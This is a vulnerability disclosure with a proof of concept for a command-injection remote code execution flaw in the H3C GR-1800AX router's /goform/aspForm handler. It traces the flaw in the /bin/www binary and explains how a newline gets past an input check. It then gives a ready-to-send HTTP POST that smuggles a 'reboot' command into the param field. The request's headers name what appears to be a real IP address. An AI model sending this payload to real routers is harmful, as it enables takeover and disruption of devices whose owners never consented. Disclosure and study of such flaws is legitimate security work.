Vulnerability introduction

H3C GR-1800AX was discovered a fatal vulnerabilities that can cause a remote code execution(RCE) via the aspForm parame

Official website : https://www.h3c.com/

Download link: https://www.h3c.com/cn/d_202304/1824907_30005_0.htm

H3C MiniGRW1B0V100R007 is the latest version on GR-1800AX

Vulnerability analysis

DelL2tpLNSList parameter in the function sub_100780E8

In the binary file /bin/www , we use IDA to locate the function sub_100780E8 that causes the vulnerability.

As you can see, the snprintf function is called on line 35 of the sub_100780E8 function. Let’s trace the source of the parameter

We found that the value of v6 and v7 is determined by parameter , we can bypass the check_function sub_1007844C by using the character ‘0a’ like this

The image shows the router rebooting after the reboot command is executed

The POC is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /goform/aspForm HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://221.211.212.130:8989
Connection: close
Referer: http://221.211.212.130:8989/vpn_l2tp_lns_user.asp?refresh=yes
Cookie: JSESSIONID=0019e6e3
Upgrade-Insecure-Requests: 1
Priority: u=4

CMD=DelL2tpLNSList&param=1; 
reboot;

Note that when copying this POC, there will be an additional 0d byte after ‘param=1;’, and all you need to do is delete this byte